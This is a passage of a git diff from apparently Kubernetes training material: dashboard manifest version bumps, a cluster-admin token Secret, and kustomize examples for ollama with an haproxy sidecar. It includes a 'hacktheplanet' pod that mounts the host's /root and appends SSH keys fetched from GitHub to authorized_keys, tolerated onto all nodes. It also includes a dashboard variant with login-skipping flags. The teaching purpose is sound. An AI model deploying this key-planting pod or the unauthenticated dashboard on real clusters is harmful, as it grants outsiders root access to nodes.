name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
---
|
||||
@@ -30,8 +30,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -43,8 +43,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -56,8 +56,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -71,8 +71,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
---
|
||||
@@ -84,8 +84,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-metrics
|
||||
rules:
|
||||
- apiGroups:
|
||||
@@ -106,8 +106,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-metrics
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
@@ -126,8 +126,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
@@ -182,8 +182,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
@@ -204,8 +204,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
kubernetes.io/cluster-service: "true"
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
@@ -229,8 +229,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
@@ -253,8 +253,8 @@ spec:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
@@ -262,7 +262,7 @@ spec:
|
||||
- --sidecar-host=http://127.0.0.1:8000
|
||||
- --enable-skip-login
|
||||
- --enable-insecure-login
|
||||
image: kubernetesui/dashboard:v2.5.0
|
||||
image: kubernetesui/dashboard:v2.7.0
|
||||
imagePullPolicy: IfNotPresent
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
@@ -293,7 +293,7 @@ spec:
|
||||
name: kubernetes-dashboard-certs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
- image: kubernetesui/metrics-scraper:v1.0.7
|
||||
- image: kubernetesui/metrics-scraper:v1.0.8
|
||||
imagePullPolicy: IfNotPresent
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
|
||||
@@ -17,8 +17,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
---
|
||||
@@ -30,8 +30,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -43,8 +43,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -56,8 +56,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -71,8 +71,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
---
|
||||
@@ -84,8 +84,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-metrics
|
||||
rules:
|
||||
- apiGroups:
|
||||
@@ -106,8 +106,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-metrics
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
@@ -126,8 +126,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
@@ -182,8 +182,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
@@ -204,8 +204,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
kubernetes.io/cluster-service: "true"
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
@@ -229,8 +229,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
@@ -253,15 +253,15 @@ spec:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- --namespace=kubernetes-dashboard
|
||||
- --auto-generate-certificates
|
||||
- --sidecar-host=http://127.0.0.1:8000
|
||||
image: kubernetesui/dashboard:v2.5.0
|
||||
image: kubernetesui/dashboard:v2.7.0
|
||||
imagePullPolicy: IfNotPresent
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
@@ -292,7 +292,7 @@ spec:
|
||||
name: kubernetes-dashboard-certs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
- image: kubernetesui/metrics-scraper:v1.0.7
|
||||
- image: kubernetesui/metrics-scraper:v1.0.8
|
||||
imagePullPolicy: IfNotPresent
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
|
||||
@@ -17,8 +17,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
---
|
||||
@@ -30,8 +30,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -43,8 +43,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -56,8 +56,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
@@ -71,8 +71,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
---
|
||||
@@ -84,8 +84,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-metrics
|
||||
rules:
|
||||
- apiGroups:
|
||||
@@ -106,8 +106,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard-metrics
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
@@ -126,8 +126,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
@@ -182,8 +182,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
@@ -204,8 +204,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
kubernetes.io/cluster-service: "true"
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
@@ -229,8 +229,8 @@ metadata:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
@@ -253,15 +253,15 @@ spec:
|
||||
app.kubernetes.io/instance: kubernetes-dashboard
|
||||
app.kubernetes.io/managed-by: Helm
|
||||
app.kubernetes.io/name: kubernetes-dashboard
|
||||
app.kubernetes.io/version: 2.5.0
|
||||
helm.sh/chart: kubernetes-dashboard-5.2.0
|
||||
app.kubernetes.io/version: 2.7.0
|
||||
helm.sh/chart: kubernetes-dashboard-6.0.0
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- --namespace=kubernetes-dashboard
|
||||
- --auto-generate-certificates
|
||||
- --sidecar-host=http://127.0.0.1:8000
|
||||
image: kubernetesui/dashboard:v2.5.0
|
||||
image: kubernetesui/dashboard:v2.7.0
|
||||
imagePullPolicy: IfNotPresent
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
@@ -292,7 +292,7 @@ spec:
|
||||
name: kubernetes-dashboard-certs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
- image: kubernetesui/metrics-scraper:v1.0.7
|
||||
- image: kubernetesui/metrics-scraper:v1.0.8
|
||||
imagePullPolicy: IfNotPresent
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
@@ -344,3 +344,12 @@ metadata:
|
||||
creationTimestamp: null
|
||||
name: cluster-admin
|
||||
namespace: kubernetes-dashboard
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
type: kubernetes.io/service-account-token
|
||||
metadata:
|
||||
name: cluster-admin-token
|
||||
namespace: kubernetes-dashboard
|
||||
annotations:
|
||||
kubernetes.io/service-account.name: cluster-admin
|
||||
|
||||
@@ -16,8 +16,7 @@ spec:
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
- operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
@@ -27,7 +26,7 @@ spec:
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
@@ -12,5 +12,5 @@ listen very-basic-load-balancer
|
||||
server blue color.blue.svc:80
|
||||
server green color.green.svc:80
|
||||
|
||||
# Note: the services above must exist,
|
||||
# otherwise HAproxy won't start.
|
||||
### Note: the services above must exist,
|
||||
### otherwise HAproxy won't start.
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
kind: HorizontalPodAutoscaler
|
||||
apiVersion: autoscaling/v2beta2
|
||||
apiVersion: autoscaling/v2
|
||||
metadata:
|
||||
name: rng
|
||||
spec:
|
||||
|
||||
@@ -0,0 +1,12 @@
|
||||
# This removes the haproxy Deployment.
|
||||
|
||||
apiVersion: kustomize.config.k8s.io/v1alpha1
|
||||
kind: Component
|
||||
|
||||
patches:
|
||||
- patch: |-
|
||||
$patch: delete
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
name: haproxy
|
||||
@@ -0,0 +1,14 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1alpha1
|
||||
kind: Component
|
||||
|
||||
# Within a Kustomization, it is not possible to specify in which
|
||||
# order transformations (patches, replacements, etc) should be
|
||||
# executed. If we want to execute transformations in a specific
|
||||
# order, one possibility is to put them in individual components,
|
||||
# and then invoke these components in the order we want.
|
||||
# It works, but it creates an extra level of indirection, which
|
||||
# reduces readability and complicates maintenance.
|
||||
|
||||
components:
|
||||
- setup
|
||||
- cleanup
|
||||
@@ -0,0 +1,20 @@
|
||||
global
|
||||
#log stdout format raw local0
|
||||
#daemon
|
||||
maxconn 32
|
||||
defaults
|
||||
#log global
|
||||
timeout client 1h
|
||||
timeout connect 1h
|
||||
timeout server 1h
|
||||
mode http
|
||||
option abortonclose
|
||||
frontend metrics
|
||||
bind :9000
|
||||
http-request use-service prometheus-exporter
|
||||
frontend ollama_frontend
|
||||
bind :8000
|
||||
default_backend ollama_backend
|
||||
maxconn 16
|
||||
backend ollama_backend
|
||||
server ollama_server localhost:11434 check
|
||||
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: haproxy
|
||||
name: haproxy
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: haproxy
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: haproxy
|
||||
spec:
|
||||
volumes:
|
||||
- name: haproxy
|
||||
configMap:
|
||||
name: haproxy
|
||||
containers:
|
||||
- image: haproxy:3.0
|
||||
name: haproxy
|
||||
volumeMounts:
|
||||
- name: haproxy
|
||||
mountPath: /usr/local/etc/haproxy
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
port: 9000
|
||||
ports:
|
||||
- name: haproxy
|
||||
containerPort: 8000
|
||||
- name: metrics
|
||||
containerPort: 9000
|
||||
resources:
|
||||
requests:
|
||||
cpu: 0.05
|
||||
limits:
|
||||
cpu: 1
|
||||
@@ -0,0 +1,75 @@
|
||||
# This adds a sidecar to the ollama Deployment, by taking
|
||||
# the pod template and volumes from the haproxy Deployment.
|
||||
# The idea is to allow to run ollama+haproxy in two modes:
|
||||
# - separately (each with their own Deployment),
|
||||
# - together in the same Pod, sidecar-style.
|
||||
# The YAML files define how to run them separetely, and this
|
||||
# "replacements" directive fetches a specific volume and
|
||||
# a specific container from the haproxy Deployment, to add
|
||||
# them to the ollama Deployment.
|
||||
#
|
||||
# This would be simpler if kustomize allowed to append or
|
||||
# merge lists in "replacements"; but it doesn't seem to be
|
||||
# possible at the moment.
|
||||
#
|
||||
# It would be even better if kustomize allowed to perform
|
||||
# a strategic merge using a fieldPath as the source, because
|
||||
# we could merge both the containers and the volumes in a
|
||||
# single operation.
|
||||
#
|
||||
# Note that technically, it might be possible to layer
|
||||
# multiple kustomizations so that one generates the patch
|
||||
# to be used in another; but it wouldn't be very readable
|
||||
# or maintainable so we decided to not do that right now.
|
||||
#
|
||||
# However, the current approach (fetching fields one by one)
|
||||
# has an advantage: it could let us transform the haproxy
|
||||
# container into a real sidecar (i.e. an initContainer with
|
||||
# a restartPolicy=Always).
|
||||
|
||||
apiVersion: kustomize.config.k8s.io/v1alpha1
|
||||
kind: Component
|
||||
|
||||
resources:
|
||||
- haproxy.yaml
|
||||
|
||||
configMapGenerator:
|
||||
- name: haproxy
|
||||
files:
|
||||
- haproxy.cfg
|
||||
|
||||
replacements:
|
||||
- source:
|
||||
kind: Deployment
|
||||
name: haproxy
|
||||
fieldPath: spec.template.spec.volumes.[name=haproxy]
|
||||
targets:
|
||||
- select:
|
||||
kind: Deployment
|
||||
name: ollama
|
||||
fieldPaths:
|
||||
- spec.template.spec.volumes.[name=haproxy]
|
||||
options:
|
||||
create: true
|
||||
- source:
|
||||
kind: Deployment
|
||||
name: haproxy
|
||||
fieldPath: spec.template.spec.containers.[name=haproxy]
|
||||
targets:
|
||||
- select:
|
||||
kind: Deployment
|
||||
name: ollama
|
||||
fieldPaths:
|
||||
- spec.template.spec.containers.[name=haproxy]
|
||||
options:
|
||||
create: true
|
||||
- source:
|
||||
kind: Deployment
|
||||
name: haproxy
|
||||
fieldPath: spec.template.spec.containers.[name=haproxy].ports.[name=haproxy].containerPort
|
||||
targets:
|
||||
- select:
|
||||
kind: Service
|
||||
name: ollama
|
||||
fieldPaths:
|
||||
- spec.ports.[name=11434].targetPort
|
||||
34
k8s/kustomize-examples/ollama-with-sidecar/blue.yaml
Normal file
34
k8s/kustomize-examples/ollama-with-sidecar/blue.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: blue
|
||||
name: blue
|
||||
spec:
|
||||
replicas: 2
|
||||
selector:
|
||||
matchLabels:
|
||||
app: blue
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: blue
|
||||
spec:
|
||||
containers:
|
||||
- image: jpetazzo/color
|
||||
name: color
|
||||
ports:
|
||||
- containerPort: 80
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: blue
|
||||
name: blue
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
selector:
|
||||
app: blue
|
||||
@@ -0,0 +1,94 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
|
||||
# Each of these YAML files contains a Deployment and a Service.
|
||||
# The blue.yaml file is here just to demonstrate that the rest
|
||||
# of this Kustomization can be precisely scoped to the ollama
|
||||
# Deployment (and Service): the blue Deployment and Service
|
||||
# shouldn't be affected by our kustomize transformers.
|
||||
resources:
|
||||
- ollama.yaml
|
||||
- blue.yaml
|
||||
|
||||
buildMetadata:
|
||||
|
||||
# Add a label app.kubernetes.io/managed-by=kustomize-vX.Y.Z
|
||||
- managedByLabel
|
||||
|
||||
# Add an annotation config.kubernetes.io/origin, indicating:
|
||||
# - which file defined that resource;
|
||||
# - if it comes from a git repository, which one, and which
|
||||
# ref (tag, branch...) it was.
|
||||
- originAnnotations
|
||||
|
||||
# Add an annotation alpha.config.kubernetes.io/transformations
|
||||
# indicating which patches and other transformers have changed
|
||||
# each resource.
|
||||
- transformerAnnotations
|
||||
|
||||
# Let's generate a ConfigMap with literal values.
|
||||
# Note that this will actually add a suffix to the name of the
|
||||
# ConfigMaps (e.g.: ollama-8bk8bd8m76) and it will update all
|
||||
# references to the ConfigMap (e.g. in Deployment manifests)
|
||||
# accordingly. The suffix is a hash of the ConfigMap contents,
|
||||
# so that basically, if the ConfigMap is edited, any workload
|
||||
# using that ConfigMap will automatically do a rolling update.
|
||||
configMapGenerator:
|
||||
- name: ollama
|
||||
literals:
|
||||
- "model=gemma3:270m"
|
||||
- "prompt=If you visit Paris, I suggest that you"
|
||||
- "queue=4"
|
||||
name: ollama
|
||||
|
||||
patches:
|
||||
# The Deployment manifest in ollama.yaml doesn't specify
|
||||
# resource requests and limits, so that it can run on any
|
||||
